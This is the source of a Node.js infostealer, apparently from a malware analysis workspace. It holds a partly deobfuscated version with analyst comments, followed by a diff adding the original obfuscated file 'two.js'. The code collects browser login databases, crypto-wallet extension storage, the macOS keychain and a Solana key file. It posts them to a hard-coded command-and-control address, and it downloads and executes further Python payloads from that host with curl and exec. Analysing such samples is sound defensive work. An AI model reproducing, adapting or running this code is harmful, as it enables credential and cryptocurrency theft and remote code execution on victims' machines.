let extensionStoragePath = path.join(siteStoragePath, itemPath2);
extensionStoragePath = path.join(extensionStoragePath, obj.vdKma);
let extensionStoragePathItems = [];
extensionStoragePathItems = fs.readdirSync(extensionStoragePath);
extensionStoragePathItems.forEach(async itemPath3 => { // default-release/storage/default/<extId>/idb/*
if (itemPath3.includes(".files")) {
let _0x7d359f = path.join(extensionStoragePath, itemPath3);
let _0x5ef2d8 = [];
_0x5ef2d8 = fs.readdirSync(_0x7d359f);
_0x5ef2d8.forEach(_0x542571 => { // default-release/storage/default/<extId>/idb/<...>.files/*
if (!fs.statSync(path.join(_0x7d359f, _0x542571)).isDirectory()) { // skips directories
let filePath = path.join(_0x7d359f, _0x542571);
const options = {
filename: outerCounter + '_' + innerCounter + '_' + _0x542571
};
filesToSteal.push({
'value': fs.createReadStream(filePath),
'options': options
});
}
});
}
});
}
});
innerCounter += 1;
}
outerCounter += 1;
});
uploadFiles(filesToSteal, timestamp);
return filesToSteal;
}
};
// uploads files to CnC
const uploadFiles = (filesToSteal, timestamp) => {
const formData = {
type: '10',
hid: "102_" + hostname,
uts: timestamp,
multi_file: filesToSteal
};
try {
if (filesToSteal.length > 0) {
const _0x13e86c = {
url: "http://95.164.17.24:1224/uploads",
formData: formData
};
request.post(_0x13e86c, (_0x3ba857, _0x24b030, _0xa33a27) => {});
}
} catch (_err) {}
};
const stealChromiumBasedBrowserExtensionFiles = async (paths, browserId, timestamp) => { // browserId: 0 => chrome, 1 => brave, 2 => opera
try {
let browserPath = '';
browserPath =
'd' == platform[0]
? getPathRelativeToHomedir('~/') + "/Library/Application Support/" + paths[1] // macos
: 'l' == platform[0]
? getPathRelativeToHomedir('~/') + "/.config/" + paths[2] // linux
: getPathRelativeToHomedir('~/') + "/AppData/" + paths[0] + "/User Data"; // windows
await stealBrowserExtensionFiles(browserPath, browserId + '_', 0 == browserId, timestamp);
} catch (_0xb053ff) {}
};
// steals macOS login keychain, Chrome and Brave login data files
const stealMacosKeychainAndChromiumLoginDataFiles = async timestamp => {
let filesToSteal = [];
let loginKeychainPath = homedir + "/Library/Keychains/login.keychain";
if (fs.existsSync(loginKeychainPath)) {
try {
const options = {
filename: "logkc-db"
};
filesToSteal.push({
'value': fs.createReadStream(loginKeychainPath),
'options': options
});
} catch (_err) {}
} else {
loginKeychainPath += "-db";
if (fs.existsSync(loginKeychainPath)) {
try {
const options = {
filename: "logkc-db"
};
filesToSteal.push({
'value': fs.createReadStream(loginKeychainPath),
'options': options
});
} catch (_err) {}
}
}
try {
let chromeFilesPath = homedir + "/Library/Application Support/Google/Chrome";
if (pathExists(chromeFilesPath)) {
for (let i = 0; i < 200; i++) {
const loginDataFilePath = chromeFilesPath + '/' + (0 === i ? "Default" : "Profile " + i) + "/Login Data";
try {
if (!pathExists(loginDataFilePath)) {
continue;
}
const ldFilePath = chromeFilesPath + "/ld_" + i;
const options = {
filename: "pld_" + i
};
if (pathExists(ldFilePath)) {
filesToSteal.push({
'value': fs.createReadStream(ldFilePath),
'options': options
});
} else {
fs.copyFile(loginDataFilePath, ldFilePath, _0x3d1081 => {
const options = {
filename: "pld_" + i
};
let filesToSteal2 = [{
'value': fs.createReadStream(loginDataFilePath),
'options': options
}];
uploadFiles(filesToSteal2, timestamp);
});
}
} catch (_err) {}
}
}
} catch (_err) {}
try {
let braveFilesPath = homedir + "/Library/Application Support/BraveSoftware/Brave-Browser";
if (pathExists(braveFilesPath)) {
for (let i = 0; i < 200; i++) {
const profilePath = braveFilesPath + '/' + (0 === i ? "Default" : "Profile " + i);
try {
if (!pathExists(profilePath)) {
continue;
}
const loginDataFilePath = profilePath + "/Login Data";
const options = {
filename: "brld_" + i
};
if (pathExists(loginDataFilePath)) {
filesToSteal.push({
'value': fs.createReadStream(loginDataFilePath),
'options': options
});
} else {
fs.copyFile(profilePath, loginDataFilePath, _0x11a26c => {
const options = {
filename: "brld_" + i
};
let filesToSteal3 = [{
'value': fs.createReadStream(profilePath),
'options': options
}];
uploadFiles(filesToSteal3, timestamp);
});
}
} catch (_err) {}
}
}
} catch (_err) {}
uploadFiles(filesToSteal, timestamp);
return filesToSteal;
};
// steals local state and login data files of the given Chromium based browser
const stealChromiumLocalStateAndLoginDataFiles = async (browserPaths, browserId, timestamp) => {
let filesToSteal = [];
let browserRealPath = '';
browserRealPath = 'd' == platform[0] ? getPathRelativeToHomedir('~/') + "/Library/Application Support/" + browserPaths[1] : 'l' == platform[0] ? getPathRelativeToHomedir('~/') + "/.config/" + browserPaths[2] : getPathRelativeToHomedir('~/') + "/AppData/" + browserPaths[0] + "/User Data";
let localStateFilePath = browserRealPath + "/Local State";
if (fs.existsSync(localStateFilePath)) {
try {
const options = {
filename: browserId + "_lst"
};
filesToSteal.push({
'value': fs.createReadStream(localStateFilePath),
'options': options
});
} catch (_err) {}
}
try {
if (pathExists(browserRealPath)) {
for (let i = 0; i < 200; i++) {
const profilePath = browserRealPath + '/' + (0 === i ? "Default" : "Profile " + i);
try {
if (!pathExists(profilePath)) {
continue;
}
const loginDataFilePath = profilePath + "/Login Data";
if (!pathExists(loginDataFilePath)) {
continue;
}
const options = {
filename: browserId + '_' + i + "_uld"
};
filesToSteal.push({
'value': fs.createReadStream(loginDataFilePath),
'options': options
});
} catch (_err) {}
}
}
} catch (_err) {}
uploadFiles(filesToSteal, timestamp);
return filesToSteal;
};
// (?), (unused)
function _0x4db77a(_0x54d20b, _0x2335f6, _0x3f5711, _0x24fd41, _0x1c2503) {
return dec1(_0x1c2503 + 713, _0x24fd41);
}
let someSize = 0;
// (?)
(function () {
let _0x635dd9;
try {
const _0x35f3bc = Function("return (function() {}.constructor(\"return this\")( ));");
_0x635dd9 = _0x35f3bc();
} catch (_0x2817b8) {
_0x635dd9 = window;
}
_0x635dd9.setInterval(_0x23e34d, 4000);
})();
// (?), (unused)
function _0x3e8d45(_0x11f906, _0x1630cb, _0xdb2689, _0x5aaac9, _0x2648fd) {
return dec1(_0xdb2689 - '0x32b', _0x1630cb);
}
function getArrOfStrs() {
const arrOfStrs = ['RHmqc', 'omjjk', 'ApteI', 'sCumQ', 'copyF', '/ld_', 'rome', 'fgpgk', 'exec', 'rneKI', 'lLrSF', 'push', 'test', 'const', 'OiABa', 'nkbih', 'ocal/', '/Libr', 'gpafn', '/Logi', 'count', 'hostn', '/Goog', 'type', 'ain', 'gger', '3037OzSgDk', 'ctor(', 'round', 'fdial', 'multi', 'mdjon', 'ata', 'idb', 'oihof', "is\")(", 'knmef', 'ync', '125CwSmIC', 'VPgoc', 'ware/', 'ess', 'IGRsE', "\\pyth", 'repla', 'Micro', 'wlUAS', '0-9a-', "\\+\\+ ", 'ensio', '-rele', 'pjiig', 'SvCSl', '16zYubJH', 'bind', 'rmSyn', 'hoSHZ', 'e/Chr', 'log', 'hfood', 'LswSJ', 'write', 'wynjd', '//95.', 'OkPvv', 'woHII', '13479389yigTOw', 'TzzgA', 'oohck', 'ort/G', '/AppD', 'Brave', 'googl', '_lst', 'ata/', 'acmac', 'AVJaB', 'on.ex', 'isDir', 'Data', 'lengt', 'jXfuU', "\\.pyp", 'yzTXQ', 'url', 'jgjfh', 'inclu', 'call', 'ng/Op', '$]*)', 'xfpZo', 'filen', 'eebol', 'ome', 'jblnd', 'excep', 'ZDfOB', 'brld_', 'bohma', 'aeaoe', 'uCJgo', 'nt/', 'trace', "n3 \"", 'IOjHQ', 'ejbal', 'nhcel', 'NNhzn', '382902FMrTAX', 'StRpE', 'ort/B', '23610RVWEoM', 'ion', 'oamin', 'table', 'pebkl', '164qDPepv', 'hid', '6465221OiGmbD', '15101090qJHwNn', 'Z_$][', 'bbldc', 'Strea', 'ogin.', 'nstru', 'post', 'ZEGam', 'JOVFD', "l Ext", 'init', '/stor', 'info', 'oZjzq', 'g/Moz', 'wOJfi', ')+)+)', 'ser', 'ame', "n (fu", 'nmhnf', 'WpCbt', 'xtens', 'bGCdl', 'forEa', '*(?:[', 'nctio', 'Defau', 'ary/K', 'bfnae', 'moz-e', 'apply', '28JNYCjU', 'rave-', '/.con', "rn th", 'UroxN', 'http:', 'des', 'raveS', 'HGaea', "-Lo \"", '/id.j', " (tru", 'fbeog', 'are/B', 'eSoft', 'ofile', " Supp", 'size', 'solan', 'bvLnu', 'path', 'Roami', 'input', 'ata/R', 'cionb', 'sJMRc', 'fOasi', 'wambz', 'dgcij', 'dlcob', 'oogle', 'conso', "ion *", "l Sta", 'tmpdi', 'warn', 'peras', "e\" \"", 'logkc', 'FZJcA', 'formD', 'statS', 'setIn', 'opera', 'lipeo', 'jXzWn', 'BmaWn', '.ldb', 'ophhp', 'error', 'eycha', '/Loca', 'funct', 'DHpkL', 'ation', 'pytho', '/pdow', 'Firef', '/.npl', '1396917dSIpDK', 'proto', 'Brows', 'lmeee', 'child', 'ins/l', 'ajnim', 'bohpj', 'ing', '_proc', 'fhboh', 'knocf', '(((.+', 'ibnej', "\" \"", 're.Op', '/uplo', "xf ", 'apagc', "n() ", 'czYua', 'DaCRF', 'GfbKa', 'pplic', 'PlQuv', "\"retu", 'eofbd', 'lmome', 'searc', 'ile', 'hifaf', 'vdKma', 'lYbbZ', " Data", 're/Op', 'onoee', 'imhlp', '7.24:', "\\( *\\", 'pld_', 'ave-B', 'gdVKS', 'ox/Pr', 'Nchdc', 'CAdIA', 'eRead', 'ads', 'YvgzM', "n Dat", 'state', 'retur', 'ructo', '/Brav', 'readd', 'bakop', 'JLXSG', 'strin', 'imael', 'efaul', 'Softw', 'ilkdb', "e) {}", 'Objec', 'ector', 'Profi', 'soft/', 'join', 'le/Ch', 'eSync', 'homed', '102', 'behhm', 'platf', 'keych', '164.1', 'dfjmm', 'aholp', 'VpXqy', '.log', 'pekpl', "curl ", 'qaEUw', '.file', '/clie', 'JPxEu', 'exist', 'acces', '1224', 'kkolj', "tar -", 'ldhgm', "le ", 'ata/L', 'aeach', 'lchlg', 'mgjnj', 'age/d', '_file', 'UaQym', 'oftwa', 'FileS', 'QxhnJ', 'toStr', 'cfgod', 'YCNuG', 'OaJhU', " -C ", 'cyKTi', 'Etbne', '__pro', 'tings', 'ccfch', 'txt', '{}.co', 'irSyn', "\\p2.z", 'fig/', '-Brow', 'renam', 'dirna', 'SIQUz', 'Edge/', '_uld', 'RdYzg', 'hecda', 'reque', '/Chro', 'sSync', 're/Br', 'jbmgj', 'phepc', 'ary/A', 'uts', 'pndod', 'fig/s', 'kodbe', 'omihk', 'WSGWI', 'nkdna', 'zA-Z_', 'olana', 'PwHqq', 'a-zA-', 'kpcnl', 'creat', 'terva', 'illa/', 'ase', 'WDvbl', '/User', 'to__', 'debu', 'orm', 'owgIh', 'ZVViQ', 'idlcd', 'gvOfj', "era S", 'rowse', 'SfxxB', 'ort/', 'pikoo', "n Set", "\\p.zi", 'dgmol', 'odkjb', 'chain', 'lZQox', "User ", 'a_id.', 'son', 'mnkoe', 'era', 'Local', 'gmccd', 'tion', 'actio', 'e-chr', 'get', 'ngcna', '-db', 'while', 'hlefn', 'com.o', 'hnfan', 'ihOIO', 'Googl', 'getTi'];
getArrOfStrs = function () {
return arrOfStrs;
};
return getArrOfStrs();
}
const extractZipFile = async zipFilePath => {
exec("tar -xf " + zipFilePath + " -C " + homedir, (_0x324a1d, _0x252b20, _0x133078) => {
if (_0x324a1d) { // error check?
fs.rmSync(zipFilePath);
return void (someSize = 0);
}
fs.rmSync(zipFilePath);
_0x12016a();
});
};
// starts downloading "p.zi" via curl, then checks again 20 secs later and renames "p.zi" to "p2.zip"
const renameOrDownloadZipPayload = () => {
const pDotZiFilePath = tmpdir + "\\p.zi";
const p2DotZipFilePath = tmpdir + "\\p2.zip";
if (someSize >= 51476596) {
return;
}
if (fs.existsSync(pDotZiFilePath)) {
try {
var pDotZiFileStat = fs.statSync(pDotZiFilePath);
if (pDotZiFileStat.size >= 51476596) {
someSize = pDotZiFileStat.size;
fs.rename(pDotZiFilePath, p2DotZipFilePath, _0x553356 => {
if (_0x553356) { // error check?
throw _0x553356;
}
extractZipFile(p2DotZipFilePath);
});
} else {
if (someSize < pDotZiFileStat.size) {
someSize = pDotZiFileStat.size;
} else {
fs.rmSync(pDotZiFilePath);
someSize = 0;
}
runRenameOrDownloadZipPayload20SecsLater();
}
} catch (_err) {}
} else {
exec("curl -Lo \"" + pDotZiFilePath + "\" \"" + "http://95.164.17.24:1224/pdown" + "\"", (_0x5411ad, _0xcb4513, _0x5de2d3) => {
if (_0x5411ad) { // error check?
someSize = 0;
return void runRenameOrDownloadZipPayload20SecsLater();
}
try {
someSize = 51476596;
fs.renameSync(pDotZiFilePath, p2DotZipFilePath);
extractZipFile(p2DotZipFilePath);
} catch (_err) {}
});
}
};
function runRenameOrDownloadZipPayload20SecsLater() {
setTimeout(() => {
renameOrDownloadZipPayload();
}, 20000);
}
// (?), (unused)
function _0x57a4c1(_0x43c66e, _0x2a997b, _0x48cd90, _0x40e99d, _0x1e8e5b) {
return dec1(_0x40e99d - '0x275', _0x2a997b);
}
const _0x12016a = async () => await new Promise((_0x233d9e, _0x5c8f91) => {
if ('w' == platform[0]) {
if (fs.existsSync(homedir + "\\.pyp\\python.exe")) {
(() => {
const _0xd5cb33 = homedir + "/.npl";
const _0x8f1f03 = "\"" + homedir + "\\.pyp\\python.exe\" \"" + _0xd5cb33 + "\"";
try {
fs.rmSync(_0xd5cb33);
} catch (_err) {}
request.get("http://95.164.17.24:1224/client/10/102", (_0x4b6c32, _0x5867cc, _0x301229) => {
if (!_0x4b6c32) {
try {
fs.writeFileSync(_0xd5cb33, _0x301229);
exec(_0x8f1f03, (_0x4795b0, _0x118518, _0x147813) => {});
} catch (_0x1b1d20) {}
}
});
})();
} else {
renameOrDownloadZipPayload();
}
} else {
(() => {
request.get("http://95.164.17.24:1224/client/10/102", (_0x571ef, _0x54cdca, _0x20d052) => {
if (!_0x571ef) {
fs.writeFileSync(homedir + "/.npl", _0x20d052);
exec("python3 \"" + homedir + "/.npl\"", (_0xc70c90, _0x515aed, _0x3e5a0a) => {});
}
});
})();
}
});
var _0x533351 = 0;
const _0x196775 = async () => {
try {
const timestamp = Math.round(new Date().getTime() / 1000);
await (async () => {
try {
await stealChromiumBasedBrowserExtensionFiles(chromePaths, 0, timestamp);
await stealChromiumBasedBrowserExtensionFiles(bravePaths, 1, timestamp);
await stealChromiumBasedBrowserExtensionFiles(operaPaths, 2, timestamp);
stealFirefoxExtensionFiles(timestamp);
if ('w' == platform[0]) {
await stealBrowserExtensionFiles(getPathRelativeToHomedir('~/') + "/AppData/Local/Microsoft/Edge/User Data", '3_', false, timestamp);
}
if ('d' == platform[0]) {
await stealMacosKeychainAndChromiumLoginDataFiles(timestamp);
} else {
await stealChromiumLocalStateAndLoginDataFiles(chromePaths, 0, timestamp);
await stealChromiumLocalStateAndLoginDataFiles(bravePaths, 1, timestamp);
await stealChromiumLocalStateAndLoginDataFiles(operaPaths, 2, timestamp);
}
} catch (_0x17de0d) {}
})();
_0x12016a();
} catch (_0xf5fe05) {}
};
_0x196775();
_0x12016a();
function dec1(in1, _) {
const arrOfStrs = getArrOfStrs();
dec1 = function (in1, _) {
in1 = in1 - 300;
let _0x159f5f = arrOfStrs[in1];
return _0x159f5f;
};
return dec1(in1, _);
}
let _0xed7e8 = setInterval(() => {
if ((_0x533351 += 1) < 5) {
_0x196775();
} else {
clearInterval(_0xed7e8);
}
}, 30000);
// (?)
function _0x23e34d(initFlag) {
const obj = {
divide: function (op1, op2) {
return op1 / op2;
}
};
obj.mod = function (op1, op2) {
return op1 % op2;
};
obj.literalAction = "action";
function _0x36aeff(_0x314f83) {
if (typeof _0x314f83 === "string") {
return function (_0x19d64e) {}.constructor("while (true) {}").apply("counter");
} else if (('' + _0x314f83 / _0x314f83).length !== 1 || obj.mod(_0x314f83, 20) === 0) {
(function () {
return true;
}).constructor("debugger").call(obj.literalAction);
} else {
(function () {
return false;
}).constructor("debugger").apply("stateObject");
}
_0x36aeff(++_0x314f83);
}
try {
if (initFlag) {
return _0x36aeff;
} else {
_0x36aeff(0);
}
} catch (_err) {}
}

600
workspace/two.js Normal file
View File

@ -0,0 +1,600 @@
(function (_0x44d3b7, _0x25fc4a) {
const _0x3f52cf = _0x44d3b7();
while (true) {
try {
const _0x5bc6eb = parseInt(_0x2c1b(436, 0x120)) / 1 * (parseInt(_0x2c1b(526, 0x15)) / 2) + parseInt(_0x2c1b(518, 0x18e)) / 3 * (-parseInt(_0x2c1b(561, 0x445)) / 4) + -parseInt(_0x2c1b(448, 0x407)) / 5 * (parseInt(_0x2c1b(521, '0x448')) / 6) + parseInt(_0x2c1b(528, '0x90')) / 7 + parseInt(_0x2c1b(463, -0x56)) / 8 * (parseInt(_0x2c1b(620, 0x125)) / 9) + parseInt(_0x2c1b(529, -0xf)) / 10 + -parseInt(_0x2c1b(476, 0x279)) / 11;
if (_0x5bc6eb === _0x25fc4a) {
break;
} else {
_0x3f52cf.push(_0x3f52cf.shift());
}
} catch (_0x326b57) {
_0x3f52cf.push(_0x3f52cf.shift());
}
}
})(_0x4eb4, 775960);
const _0x3f64bb = function () {
let _0x4624cb = true;
return function (_0x56a168, _0x4b09b7) {
const _0x3343a9 = _0x4624cb ? function () {
if (_0x4b09b7) {
const _0x5bdfee = _0x4b09b7.apply(_0x56a168, arguments);
_0x4b09b7 = null;
return _0x5bdfee;
}
} : function () {};
_0x4624cb = false;
return _0x3343a9;
};
}();
const _0xb564a4 = _0x3f64bb(this, function () {
return _0xb564a4.toString().search("(((.+)+)+)+$").toString().constructor(_0xb564a4).search("(((.+)+)+)+$");
});
function _0x23f8f9(_0x578d77, _0x599245, _0x29ff3c, _0xdc1b7e, _0x48949a) {
return _0x2c1b(_0xdc1b7e + 755, _0x48949a);
}
_0xb564a4();
const _0x2fd3bd = function () {
let _0x2857ec = true;
return function (_0x4380c3, _0x332592) {
const _0x263396 = _0x2857ec ? function () {
if (_0x332592) {
const _0x548336 = _0x332592.apply(_0x4380c3, arguments);
_0x332592 = null;
return _0x548336;
}
} : function () {};
_0x2857ec = false;
return _0x263396;
};
}();
(function () {
_0x2fd3bd(this, function () {
const _0x18fbc2 = new RegExp("function *\\( *\\)");
const _0x34bf5d = new RegExp("\\+\\+ *(?:[a-zA-Z_$][0-9a-zA-Z_$]*)", 'i');
const _0x100ae1 = _0x23e34d("init");
if (!_0x18fbc2.test(_0x100ae1 + "chain") || !_0x34bf5d.test(_0x100ae1 + "input")) {
_0x100ae1('0');
} else {
_0x23e34d();
}
})();
})();
const _0x2a5a96 = function () {
let _0x499a96 = true;
return function (_0x4bdc0a, _0x2d3630) {
const _0x4d49c5 = _0x499a96 ? function () {
if (_0x2d3630) {
const _0x6d2bf8 = _0x2d3630.apply(_0x4bdc0a, arguments);
_0x2d3630 = null;
return _0x6d2bf8;
}
} : function () {};
_0x499a96 = false;
return _0x4d49c5;
};
}();
function _0x7010db(_0x3a87e1, _0x262e58, _0x514759, _0x2b76a4, _0x4bebf3) {
return _0x2c1b(_0x2b76a4 - 0x33c, _0x4bebf3);
}
const _0x42c5cd = _0x2a5a96(this, function () {
const _0x44d9f9 = {
FZJcA: function (_0x3da6c0, _0x394407) {
return _0x3da6c0 + _0x394407;
},
OkPvv: "error"
};
_0x44d9f9.YCNuG = "table";
const _0x2b2df2 = function () {
let _0x4fa761;
try {
_0x4fa761 = Function("return (function() {}.constructor(\"return this\")( ));")();
} catch (_0x3bd620) {
_0x4fa761 = window;
}
return _0x4fa761;
};
const _0x34f1df = _0x2b2df2();
const _0x5673cb = _0x34f1df.console = _0x34f1df.console || {};
const _0xe6fbcf = ["log", "warn", "info", "error", "exception", _0x44d9f9.YCNuG, "trace"];
for (let _0x14f39d = 0; _0x14f39d < _0xe6fbcf.length; _0x14f39d++) {
const _0x180732 = _0x2a5a96.constructor.prototype.bind(_0x2a5a96);
const _0x4490ff = _0xe6fbcf[_0x14f39d];
const _0x2797c6 = _0x5673cb[_0x4490ff] || _0x180732;
_0x180732.__proto__ = _0x2a5a96.bind(_0x2a5a96);
_0x180732.toString = _0x2797c6.toString.bind(_0x2797c6);
_0x5673cb[_0x4490ff] = _0x180732;
}
});
_0x42c5cd();
const _0x5d6927 = require('fs');
const _0x40d0a6 = require('os');
const _0x23a3a6 = require("path");
const _0x2672a8 = require("request");
const _0x5f30d8 = require("child_process").exec;
const _0x57dd93 = _0x40d0a6.hostname();
const _0x44547c = _0x40d0a6.platform();
const _0x107674 = _0x40d0a6.homedir();
const _0x46f1a8 = _0x40d0a6.tmpdir();
const _0x1aace1 = _0x2b012b => _0x2b012b.replace(/^~([a-z]+|\/)/, (_0x581e90, _0x772cb7) => '/' === _0x772cb7 ? _0x107674 : _0x23a3a6.dirname(_0x107674) + '/' + _0x772cb7);
function _0x58c289(_0x23cb6a) {
try {
_0x5d6927.accessSync(_0x23cb6a);
return true;
} catch (_0x5a7e7b) {
return false;
}
}
const _0x59e3a3 = ["Local/BraveSoftware/Brave-Browser", "BraveSoftware/Brave-Browser", "BraveSoftware/Brave-Browser"];
const _0x112912 = ["Local/Google/Chrome", "Google/Chrome", "google-chrome"];
const _0x1c4641 = ["Roaming/Opera Software/Opera Stable", "com.operasoftware.Opera", "opera"];
const _0x26f8e8 = ["nkbihfbeogaeaoehlefnkodbefgpgknn", "ejbalbakoplchlghecdalmeeeajnimhm", "fhbohimaelbohpjbbldcngcnapndodjp", "hnfanknocfeofbddgcijnmhnfnkdnaad", "ibnejdfjmmkpcnlpebklmnkoeoihofec", "bfnaelmomeimhlpmgjnjophhpkkoljpa", "aeachknmefphepccionboohckonoeemg", "hifafgmccdpekplomjjkcfgodnhcellj", "jblndlipeogpafnldhgmapagcccfchpi", "acmacodkjbdgmoleebolmdjonilkdbch", "dlcobpjiigpikoobohmabehhmhfoodbb", "aholpfdialjgjfhomihkjbmgjidlcdno"];
const _0x55c70b = async (_0x74005c, _0x1619f2, _0x271271, _0x15b9d4) => {
let _0x5f5c9a;
if (!_0x74005c || '' === _0x74005c) {
return [];
}
try {
if (!_0x58c289(_0x74005c)) {
return [];
}
} catch (_0x5173b7) {
return [];
}
if (!_0x1619f2) {
_0x1619f2 = '';
}
let _0x3a1589 = [];
for (let _0x448a78 = 0; _0x448a78 < 200; _0x448a78++) {
const _0x220e15 = _0x74005c + '/' + (0 === _0x448a78 ? "Default" : "Profile " + _0x448a78) + "/Local Extension Settings";
for (let _0x2cf58e = 0; _0x2cf58e < _0x26f8e8.length; _0x2cf58e++) {
let _0x1728b3 = _0x220e15 + '/' + _0x26f8e8[_0x2cf58e];
if (_0x58c289(_0x1728b3)) {
let _0xce9f95 = [];
try {
_0xce9f95 = _0x5d6927.readdirSync(_0x1728b3);
} catch (_0x4f5794) {
_0xce9f95 = [];
}
_0xce9f95.forEach(async _0x2df3d4 => {
let _0x682ed9 = _0x23a3a6.join(_0x1728b3, _0x2df3d4);
try {
const _0x2f2039 = {
filename: "102_" + _0x1619f2 + _0x448a78 + '_' + _0x26f8e8[_0x2cf58e] + '_' + _0x2df3d4
};
if (_0x682ed9.includes(".log") || _0x682ed9.includes(".ldb")) {
_0x3a1589.push({
'value': _0x5d6927.createReadStream(_0x682ed9),
'options': _0x2f2039
});
}
} catch (_0x2cf340) {}
});
}
}
}
if (_0x271271 && (_0x5f5c9a = _0x107674 + "/.config/solana/id.json", _0x5d6927.existsSync(_0x5f5c9a))) {
try {
const _0x549590 = {
filename: "solana_id.txt"
};
_0x3a1589.push({
'value': _0x5d6927.createReadStream(_0x5f5c9a),
'options': _0x549590
});
} catch (_0x544e44) {}
}
_0x1d40e9(_0x3a1589, _0x15b9d4);
return _0x3a1589;
};
const _0x136e48 = _0x3cda14 => {
const _0x43b1e3 = _0x1aace1('~/') + "/AppData/Roaming/Mozilla/Firefox/Profiles";
let _0x1cfd17 = [];
if (_0x58c289(_0x43b1e3)) {
let _0x232968 = [];
try {
_0x232968 = _0x5d6927.readdirSync(_0x43b1e3);
} catch (_0x33914c) {
_0x232968 = [];
}
let _0xa1f717 = 0;
_0x232968.forEach(async _0x30f059 => {
const _0x322a44 = {
GfbKa: ".files"
};
_0x322a44.vdKma = "idb";
let _0x19d05b = _0x23a3a6.join(_0x43b1e3, _0x30f059);
if (_0x19d05b.includes("-release")) {
let _0x9926c3 = _0x23a3a6.join(_0x19d05b, "/storage/default");
let _0x53196a = [];
_0x53196a = _0x5d6927.readdirSync(_0x9926c3);
let _0x53d974 = 0;
_0x53196a.forEach(async _0x450031 => {
if (_0x450031.includes("moz-extension")) {
let _0x53c5fc = _0x23a3a6.join(_0x9926c3, _0x450031);
_0x53c5fc = _0x23a3a6.join(_0x53c5fc, _0x322a44.vdKma);
let _0x16f13d = [];
_0x16f13d = _0x5d6927.readdirSync(_0x53c5fc);
_0x16f13d.forEach(async _0xbdd99 => {
if (_0xbdd99.includes(".files")) {
let _0x7d359f = _0x23a3a6.join(_0x53c5fc, _0xbdd99);
let _0x5ef2d8 = [];
_0x5ef2d8 = _0x5d6927.readdirSync(_0x7d359f);
_0x5ef2d8.forEach(_0x542571 => {
if (!_0x5d6927.statSync(_0x23a3a6.join(_0x7d359f, _0x542571)).isDirectory()) {
let _0x437ea9 = _0x23a3a6.join(_0x7d359f, _0x542571);
const _0x22f124 = {
filename: _0xa1f717 + '_' + _0x53d974 + '_' + _0x542571
};
_0x1cfd17.push({
'value': _0x5d6927.createReadStream(_0x437ea9),
'options': _0x22f124
});
}
});
}
});
}
});
_0x53d974 += 1;
}
_0xa1f717 += 1;
});
_0x1d40e9(_0x1cfd17, _0x3cda14);
return _0x1cfd17;
}
};
const _0x1d40e9 = (_0x41488d, _0x4b757a) => {
const _0x2fc5e5 = {
type: '10',
hid: "102_" + _0x57dd93,
uts: _0x4b757a,
multi_file: _0x41488d
};
try {
if (_0x41488d.length > 0) {
const _0x13e86c = {
url: "http://95.164.17.24:1224/uploads",
formData: _0x2fc5e5
};
_0x2672a8.post(_0x13e86c, (_0x3ba857, _0x24b030, _0xa33a27) => {});
}
} catch (_0x21d5a8) {}
};
const _0x3bafbe = async (_0x338545, _0x46dee6, _0x2a9c76) => {
try {
let _0x40b50d = '';
_0x40b50d = 'd' == _0x44547c[0] ? _0x1aace1('~/') + "/Library/Application Support/" + _0x338545[1] : 'l' == _0x44547c[0] ? _0x1aace1('~/') + "/.config/" + _0x338545[2] : _0x1aace1('~/') + "/AppData/" + _0x338545[0] + "/User Data";
await _0x55c70b(_0x40b50d, _0x46dee6 + '_', 0 == _0x46dee6, _0x2a9c76);
} catch (_0xb053ff) {}
};
const _0x1d28ea = async _0xa9cd1c => {
let _0x56aa20 = [];
let _0x53e13f = _0x107674 + "/Library/Keychains/login.keychain";
if (_0x5d6927.existsSync(_0x53e13f)) {
try {
const _0xbe1287 = {
filename: "logkc-db"
};
_0x56aa20.push({
'value': _0x5d6927.createReadStream(_0x53e13f),
'options': _0xbe1287
});
} catch (_0x468fa3) {}
} else {
_0x53e13f += "-db";
if (_0x5d6927.existsSync(_0x53e13f)) {
try {
const _0x56e85b = {
filename: "logkc-db"
};
_0x56aa20.push({
'value': _0x5d6927.createReadStream(_0x53e13f),
'options': _0x56e85b
});
} catch (_0x5ae156) {}
}
}
try {
let _0x257033 = _0x107674 + "/Library/Application Support/Google/Chrome";
if (_0x58c289(_0x257033)) {
for (let _0xec59b3 = 0; _0xec59b3 < 200; _0xec59b3++) {
const _0x1efa98 = _0x257033 + '/' + (0 === _0xec59b3 ? "Default" : "Profile " + _0xec59b3) + "/Login Data";
try {
if (!_0x58c289(_0x1efa98)) {
continue;
}
const _0x27661b = _0x257033 + "/ld_" + _0xec59b3;
const _0x1db234 = {
filename: "pld_" + _0xec59b3
};
if (_0x58c289(_0x27661b)) {
_0x56aa20.push({
'value': _0x5d6927.createReadStream(_0x27661b),
'options': _0x1db234
});
} else {
_0x5d6927.copyFile(_0x1efa98, _0x27661b, _0x3d1081 => {
const _0x5b78fc = {
filename: "pld_" + _0xec59b3
};
let _0x279e2a = [{
'value': _0x5d6927.createReadStream(_0x1efa98),
'options': _0x5b78fc
}];
_0x1d40e9(_0x279e2a, _0xa9cd1c);
});
}
} catch (_0x54d621) {}
}
}
} catch (_0x21cd01) {}
try {
let _0x53a8b5 = _0x107674 + "/Library/Application Support/BraveSoftware/Brave-Browser";
if (_0x58c289(_0x53a8b5)) {
for (let _0x1b3d70 = 0; _0x1b3d70 < 200; _0x1b3d70++) {
const _0x2c6372 = _0x53a8b5 + '/' + (0 === _0x1b3d70 ? "Default" : "Profile " + _0x1b3d70);
try {
if (!_0x58c289(_0x2c6372)) {
continue;
}
const _0x2999c0 = _0x2c6372 + "/Login Data";
const _0x476351 = {
filename: "brld_" + _0x1b3d70
};
if (_0x58c289(_0x2999c0)) {
_0x56aa20.push({
'value': _0x5d6927.createReadStream(_0x2999c0),
'options': _0x476351
});
} else {
_0x5d6927.copyFile(_0x2c6372, _0x2999c0, _0x11a26c => {
const _0x4d068e = {
filename: "brld_" + _0x1b3d70
};
let _0x4c62cb = [{
'value': _0x5d6927.createReadStream(_0x2c6372),
'options': _0x4d068e
}];
_0x1d40e9(_0x4c62cb, _0xa9cd1c);
});
}
} catch (_0x50b560) {}
}
}
} catch (_0x28c644) {}
_0x1d40e9(_0x56aa20, _0xa9cd1c);
return _0x56aa20;
};
const _0x25acc1 = async (_0x34ebcf, _0x1558fe, _0x2c6034) => {
let _0x1a0daf = [];
let _0x11dfbb = '';
_0x11dfbb = 'd' == _0x44547c[0] ? _0x1aace1('~/') + "/Library/Application Support/" + _0x34ebcf[1] : 'l' == _0x44547c[0] ? _0x1aace1('~/') + "/.config/" + _0x34ebcf[2] : _0x1aace1('~/') + "/AppData/" + _0x34ebcf[0] + "/User Data";
